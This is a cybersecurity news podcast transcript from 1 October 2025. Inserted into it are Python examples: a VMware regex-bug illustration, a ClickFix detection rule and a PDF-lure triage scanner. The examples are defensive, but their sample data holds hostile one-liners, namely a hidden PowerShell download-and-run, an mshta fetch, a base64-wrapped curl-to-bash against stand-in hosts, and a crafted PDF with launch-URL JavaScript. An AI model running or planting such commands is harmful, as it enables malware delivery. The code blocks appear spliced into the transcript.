The CyberWire Daily Podcast 10.1.25
Ep 2404 | 10.1.25

When politics break the firewall.

Transcript

Major federal cybersecurity programs expire amidst the government shutdown. Global leaders and experts convene in Riyadh for the Global Cybersecurity Forum. NIST tackles removable media. ICE buys vast troves of smartphone location data. Researchers claim a newly patched VMware vulnerability has been a zero-day for nearly a year. ClickFix-style attacks surge and spread across platforms. Battering RAM defeats memory encryption and boot-time defenses. A new phishing toolkit converts ordinary PDFs into interactive lures. A trio of breaches exposes data of 3.7 million across North America. Tim Starks from CyberScoop unpacks a report from Senate Democrats on DOGE. The Lone Star State proves even the internet isn’t bulletproof.

Today is Wednesday October 1st 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Two major federal cybersecurity programs expire amidst the government shutdown. 

Two major federal cybersecurity programs are set to expire this morning as Congress remains deadlocked over government funding. The Cybersecurity Information Sharing Act of 2015, which shields companies that share threat intelligence, and the $1 billion State and Local Cybersecurity Grant Program will both lapse without reauthorization.

The House advanced renewal bills earlier this month, but Senate gridlock has left the programs tied to a stalled stopgap spending measure. Tensions boiled over Tuesday, with Sen. Gary Peters (D-MI) warning the lapse would weaken U.S. defenses, while Sen. Rand Paul (R-KY) blocked an extension, citing concerns about alleged free speech abuses by the Cybersecurity and Infrastructure Security Agency.

Former CISA deputy director Nitin Natarajan said both efforts are critical for resilience, particularly for smaller jurisdictions. Without them, he warned, threat sharing and cyber defenses will diminish, raising risks for everyday Americans.

Global leaders and experts convene in Riyadh for the Global Cybersecurity Forum. 

Global leaders and experts convened in Riyadh for the Global Cybersecurity Forum, focusing on “scaling cohesive advancement in cyberspace.” Discussions centered on artificial intelligence, quantum computing, and the urgent need for global cooperation to counter rapidly evolving cyber threats. Speakers highlighted AI’s dual role as both a defensive tool and an attack enabler, stressing the importance of resilience over purely preventive strategies.

ITU Secretary-General Doreen Bogdan-Martin underscored the value of standards for trust in communications, while Interpol officials compared personal cyber defense to securing one’s home. Other panelists warned that cyberattacks target people as much as machines, with rising risks from disinformation and low-cost AI-driven exploits. Saudi Arabia and the UN announced a new global capacity-building initiative to strengthen training, research, and policy development worldwide.

NIST tackles removable media. 

NIST has released Special Publication 1334, a concise guide to managing cybersecurity risks from removable media in operational technology environments. The document highlights USB flash drives as common tools for firmware updates and diagnostics but also major malware vectors threatening industrial control systems. The two-page guide outlines procedural, physical, technical, and transportation controls, urging strict policies, secure storage, malware scanning, and data sanitization. NIST warns infected devices can disrupt operations or compromise safety, underscoring the growing sophistication of OT-targeted threats.

ICE buys vast troves of smartphone location data. 

Immigration and Customs Enforcement (ICE) has resumed purchasing access to vast troves of smartphone location data, according to documents reviewed by 404 Media. ICE selected surveillance tools from Penlink, whose products Tangles and Webloc aggregate billions of daily signals from hundreds of millions of devices and link them with social media data for analysis. The decision reverses earlier assurances that ICE had ended such practices after a Department of Homeland Security Inspector General report found the agency violated the law by using location data without adequate safeguards. Critics, including Sen. Ron Wyden, warn the program enables warrantless tracking of Americans’ movements in sensitive areas such as abortion clinics or houses of worship. ICE maintains the data is necessary to support investigative missions.

Researchers claim a newly patched VMware vulnerability has been a zero-day for nearly a year. 

A newly patched VMware vulnerability, CVE-2025-41244, has been exploited as a zero-day since October 2024, according to NVISO Labs. The flaw, rated high-severity with a CVSS score of 7.8, impacts VMware Aria Operations and VMware Tools, allowing attackers to escalate privileges to root on virtual machines. While Broadcom released patches this week, its advisory did not acknowledge in-the-wild exploitation. NVISO attributes the activity to Chinese state-sponsored group UNC5174, which has used the bug for at least a year. The issue also affects the open-source variant open-vm-tools, included in major Linux distributions. NVISO warns attackers can exploit weak regex logic to elevate malicious binaries staged in writable directories. Broadcom has patched affected products, with Linux vendors to deliver updates for open-vm-tools.
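The bug class behind that "weak regex logic" is easy to reproduce on paper: a privileged agent lists processes, picks those whose executable looks like a known service, and runs that executable with a version flag as root. The following Python is an added example, not VMware/Broadcom's, open-vm-tools' or NVISO's code; the process table, stat data, service list, flag and both regexes are constructed for illustration and are not the real script. The weak pattern accepts any directory prefix, so a binary an unprivileged user drops in /tmp gets executed as root; the hardened variant pins the path to system directories and adds an ownership check.

```python
"""Broad-regex service discovery, the bug class behind CVE-2025-41244 (illustrative)."""
import re

SERVICE_NAMES = ("httpd", "nginx", "mysqld", "sshd")      # assumed service list
SYSTEM_DIRS = ("/usr/sbin", "/usr/bin", "/sbin", "/bin")   # assumed pinned dirs

# Constructed `ps`-style output: (pid, uid, command line).
PROCESS_TABLE = [
    (412, 0, "/usr/sbin/httpd -DFOREGROUND"),
    (933, 0, "/usr/sbin/mysqld --basedir=/usr"),
    (1501, 1000, "/tmp/httpd --keep-alive"),             # staged by uid 1000
    (1502, 1000, "/home/alice/.cache/nginx -g daemon"),  # staged by uid 1000
    (77, 0, "/usr/bin/python3 /opt/app/agent.py"),
]
# Constructed stat() results: path -> (owner uid, mode bits).
FILE_META = {
    "/usr/sbin/httpd": (0, 0o755),
    "/usr/sbin/mysqld": (0, 0o755),
    "/tmp/httpd": (1000, 0o777),
    "/home/alice/.cache/nginx": (1000, 0o755),
}

# Weak: `\S+/` matches any directory prefix, including world-writable ones.
WEAK_PATTERN = re.compile(r"^(\S+/(?:%s))\b" % "|".join(SERVICE_NAMES))
# Hardened: the directory must be one of a few root-owned system locations.
STRICT_PATTERN = re.compile(
    r"^((?:%s)/(?:%s))\b"
    % ("|".join(re.escape(d) for d in SYSTEM_DIRS), "|".join(SERVICE_NAMES))
)


def candidates(pattern, table=PROCESS_TABLE):
    """Executable paths the probe would run as `<path> --version`, as root."""
    found = []
    for _pid, _uid, cmdline in table:
        match = pattern.match(cmdline)
        if match:
            found.append(match.group(1))
    return found


def trusted_binary(path, meta=FILE_META):
    """Second gate: root-owned and not writable by group or others.

    Path pinning alone is not enough if a system directory is misconfigured;
    in production replace `meta` with os.stat(path) and check st_uid/st_mode.
    """
    owner, mode = meta.get(path, (None, 0))
    return owner == 0 and not (mode & 0o022)


def weak_probe(table=PROCESS_TABLE):
    """What the vulnerable logic would execute: /tmp/httpd runs as root."""
    return [[p, "--version"] for p in candidates(WEAK_PATTERN, table)]


def strict_probe(table=PROCESS_TABLE, meta=FILE_META):
    """Hardened logic: pinned directories plus an ownership/permission check."""
    return [[p, "--version"]
            for p in candidates(STRICT_PATTERN, table) if trusted_binary(p, meta)]


if __name__ == "__main__":
    print("weak  :", weak_probe())
    print("strict:", strict_probe())
```

Nothing is executed here; the functions only return the argv the agent would spawn. The point for defenders is that the fix is not a tighter regex alone: a second gate on the file's owner and mode catches the case where the "system" directory itself has been made writable.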

ClickFix-style attacks surge and spread across platforms. 

ClickFix-style attacks are surging and spreading across platforms. Huntress reports a 631 percent rise in incidents over six months, with techniques now abusing native macOS and Linux functions, not just Windows.

Adversaries weaponize user helpfulness: fake verifications and interstitials copy attacker commands to the clipboard, then prompt execution via Run, File Explorer, PowerShell, or staged downloads. Variants include FileFix, TerminalFix, and DownloadFix. Observed payload flows show explorer.exe or a browser spawning scripting interpreters and making outbound connections, with registry and file artifacts that aid detection.

This matters because these lures bypass technical controls and target behavior. Detection “chokepoints” focus on interpreters, suspicious parent processes, and network egress, plus behavioral analytics and process-relationship monitoring to cover future iterations and payload swaps, including scams and phishing.
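One way to turn those chokepoints into a rule, as an added example that is not part of the transcript and not Huntress's detection content: walk process-start telemetry and score each scripting interpreter on three signals, a browser or explorer.exe parent, a pasted-looking download-and-run command line, and outbound network activity, alerting at two or more. The field names, process names, patterns and sample events below are constructed for this illustration.

```python
"""Process-relationship rule for ClickFix-style executions (illustrative)."""
import re

INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "bash", "sh", "zsh", "osascript",
}
# Parents that rarely launch an interpreter on their own: the lure steered
# the user through the Run box, the File Explorer address bar or a browser.
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                "google chrome", "firefox", "safari"}
# Command-line shapes typical of clipboard-delivered one-liners.
SUSPICIOUS_CMD = re.compile(
    r"(?i)(\biex\b|invoke-expression|downloadstring|frombase64string"
    r"|-enc(odedcommand)?\s|mshta\s+https?://|curl\s[^|]*\|\s*(ba|z)?sh\b"
    r"|base64\s+(-d|--decode)|\bnohup\b|osascript\s+-e)"
)

EVENTS = [  # constructed telemetry: one record per process start
    {"pid": 101, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -c iex (irm https://verify.example/check)",
     "network": True},
    {"pid": 202, "parent": "msedge.exe", "image": "cmd.exe",
     "cmdline": "cmd /c start /min mshta https://captcha-check.example/verify.hta",
     "network": True},
    {"pid": 303, "parent": "Terminal", "image": "bash",
     "cmdline": 'bash -c "echo Y3VybCBodHRwczovL2JhZC5leGFtcGxlL3ggfCBiYXNo | base64 -d | bash"',
     "network": True},
    {"pid": 404, "parent": "services.exe", "image": "powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\nightly-backup.ps1",
     "network": False},
    {"pid": 505, "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r"cmd /c dir C:\Users\alice\Documents",
     "network": False},
]


def signals(event):
    """Return the list of signals an interpreter start trips (empty if not an interpreter)."""
    reasons = []
    if event["image"].lower() not in INTERPRETERS:
        return reasons
    if event["parent"].lower() in LURE_PARENTS:
        reasons.append("lure_parent")
    if SUSPICIOUS_CMD.search(event["cmdline"]):
        reasons.append("suspicious_cmdline")
    if event["network"]:
        reasons.append("network_egress")
    return reasons


def detect(events, threshold=2):
    """Map pid -> signals for every event that reaches the alert threshold."""
    alerts = {}
    for event in events:
        reasons = signals(event)
        if len(reasons) >= threshold:
            alerts[event["pid"]] = reasons
    return alerts


if __name__ == "__main__":
    for pid, reasons in detect(EVENTS).items():
        print(pid, reasons)
```

The threshold is what keeps the rule from paging on every `cmd /c dir` launched from Explorer: a lure parent alone scores one, and only the combination with a pasted-looking command line or egress crosses the line. The macOS record (pid 303) shows why the parent check is not enough on its own; a Terminal-spawned shell is normal, but `base64 -d | bash` plus a connection is not.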

Battering RAM defeats memory encryption and boot-time defenses. 

Researchers representing KU Leuven in Belgium and the University of Birmingham and Durham University in the UK disclosed Battering RAM, a hardware attack that uses a ~$50 interposer placed between CPU and DRAM to gain plaintext access to protected memory on Intel and AMD systems. The technique can bypass Intel SGX and AMD SEV-SNP, defeating memory encryption and boot-time defenses by redirecting protected addresses to attacker-controlled locations. The proof-of-concept targets DDR4, requires brief physical access, and cannot be patched by software. Intel and AMD say physical-access attacks fall outside their threat models. Full technical details were published by the researchers.

A new phishing toolkit converts ordinary PDFs into interactive lures. 

A new phishing and malware toolkit called MatrixPDF converts ordinary PDFs into interactive lures that can bypass email defenses and redirect victims to credential-theft pages or malware, Varonis researchers told BleepingComputer. First seen on cybercrime forums and promoted via Telegram, the builder—marketed as a phishing-simulation and blackteaming product—lets attackers import legitimate PDFs, add blurred content and fake “Secure Document” prompts, and embed JavaScript and clickable overlays that open external payload URLs. Because the PDFs carry no malicious binaries, Gmail’s viewer does not execute PDF JavaScript and treats subsequent fetches as user-initiated clicks, enabling a filter bypass. MatrixPDF is sold by subscription. Varonis urges AI-driven email defenses that analyze PDF structure, detect overlays, and detonate embedded URLs in sandboxes.
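The structural checks Varonis describes can be done without opening the document in a viewer. The script below is an added example, not Varonis's or MatrixPDF's code: it scans raw PDF bytes (after undoing `/#xx` name escapes and inflating FlateDecode streams) for JavaScript, OpenAction, Launch and URI actions, extracts the URLs, and flags a Link annotation that covers most of the page, which is how a "click anywhere" overlay is built. The three sample PDFs are constructed inline; a real document may still hide content in object streams, encryption or indirect references this scanner does not follow.

```python
"""Static triage of a PDF for JavaScript, action dictionaries and full-page link overlays."""
import re
import zlib

NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
OBJECT = re.compile(rb"(\d+)\s+(\d+)\s+obj(.*?)endobj", re.S)
STREAM = re.compile(rb"<<([^>]*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)
URL = re.compile(rb"https?://[^\s'\"<>()]+")
RECT = re.compile(rb"/Rect\s*\[([^\]]+)\]")
MEDIABOX = re.compile(rb"/MediaBox\s*\[([^\]]+)\]")


def unescape_names(data):
    """Turn /Java#53cript back into /JavaScript so keyword checks cannot be dodged."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data):
    """Decompressed bodies of every FlateDecode stream; other filters are skipped."""
    out = []
    for dict_, body in STREAM.findall(data):
        if b"/FlateDecode" in dict_:
            try:
                out.append(zlib.decompress(body))
            except zlib.error:
                pass
    return out


def _area(text):
    nums = [float(x) for x in text.split()]
    return abs(nums[2] - nums[0]) * abs(nums[3] - nums[1]) if len(nums) == 4 else 0.0


def overlay_links(text, min_fraction=0.5):
    """Link annotations whose /Rect covers at least min_fraction of the page."""
    boxes = [_area(b) for b in MEDIABOX.findall(text)]
    page_area = max(boxes) if boxes else 612.0 * 792.0  # assume US Letter if absent
    hits = []
    for _num, _gen, body in OBJECT.findall(text):
        if b"/Link" in body:
            for rect in RECT.findall(body):
                if _area(rect) >= min_fraction * page_area:
                    hits.append(rect.strip().decode())
    return hits


def triage_pdf(data):
    """Return a dict of findings; 'suspicious' is the overall verdict."""
    text = unescape_names(data) + b"\n".join(unescape_names(s) for s in inflate_streams(data))
    findings = {
        "javascript": re.search(rb"/(?:JavaScript|JS)\b", text) is not None,
        "open_action": re.search(rb"/(?:OpenAction|AA)\b", text) is not None,
        "launch": re.search(rb"/Launch\b", text) is not None,
        "uris": sorted({u.decode("ascii", "replace") for u in URL.findall(text)}),
        "overlay_links": overlay_links(text),
    }
    findings["suspicious"] = bool(findings["javascript"] or findings["launch"]
                                  or (findings["overlay_links"] and findings["uris"]))
    return findings


# Constructed samples, not real lure files. LURE_PDF: blurred-page style lure with a
# full-page link overlay, an OpenAction and an escaped /JavaScript name.
LURE_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [0 0 612 792] /A << /S /URI /URI (https://docs-verify.example/open?id=1) >> >> endobj
5 0 obj << /S /Java#53cript /JS (app.launchURL("https://docs-verify.example/open?id=1", true);) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

CLEAN_PDF = b"""%PDF-1.7
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 4 0 R >> endobj
4 0 obj << /Length 44 >> stream
BT /F1 12 Tf 72 720 Td (Quarterly report) Tj ET
endstream endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def _flate_object(num, payload):
    comp = zlib.compress(payload)
    return (b"%d 0 obj << /Length %d /Filter /FlateDecode >> stream\n" % (num, len(comp))
            + comp + b"\nendstream endobj\n")


# Same JavaScript, but the script body lives in a compressed stream.
COMPRESSED_LURE = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"5 0 obj << /S /JavaScript /JS 6 0 R >> endobj\n"
    + _flate_object(6, b'app.launchURL("https://docs-verify.example/stage2", true);')
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for name, pdf in (("lure", LURE_PDF), ("clean", CLEAN_PDF), ("compressed", COMPRESSED_LURE)):
        print(name, triage_pdf(pdf))
```

Two details matter in practice. Name escapes (`/Java#53cript`) and Flate-compressed objects are the cheapest ways to hide `/JavaScript` from a keyword filter, so both are normalised before matching. And the overlay check is deliberately about geometry rather than content: a single Link annotation whose rectangle covers the page is a strong structural signal regardless of what the fake "Secure Document" artwork says, and the extracted URLs are what you would hand to a sandbox for detonation.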

A trio of breaches exposes data of 3.7 million across North America. 

Three companies disclosed breaches this week impacting about 3.7 million people across North America. Allianz Life confirmed nearly 1.5 million customers, staff, and financial professionals were exposed in a third-party CRM break-in, with Social Security numbers among the data stolen. Canadian airline WestJet reported 1.2 million Americans’ information compromised in a June attack linked to Scattered Spider, though no payment data was taken. Meanwhile, Ohio-based Motility Software Solutions said ransomware affected 766,670 people, potentially exposing personal and license data. All firms offered credit monitoring.

The Lone Star State proves even the internet isn’t bulletproof. 

The internet, it turns out, is just as fragile as the squirrels and snakes that occasionally gnaw or slither their way into service outages. Last week in Texas, though, the culprit wasn’t wildlife but a bullet. A stray round pierced a fiber optic cable, cutting off Spectrum service for 25,000 people across Dallas, Austin, San Antonio, and beyond. Customers lost internet, phones, and TV—mid-meeting, mid-binge, mid-life. Spectrum confirmed the gunshot damage but offered no clues about who fired the shot or how they figured it out. In sprawling Texas, with its abundance of firearms and jurisdictions, tracing one stray bullet is like hunting tumbleweeds. America has seen wildlife take out the internet before, but only here do bullets sometimes join the food chain of digital disruption.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

N2K’s senior producer is Alice Carruth. Our producer is Liz Stokes. We’re mixed by Elliott Peltzman and Tré Hester, with original music by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.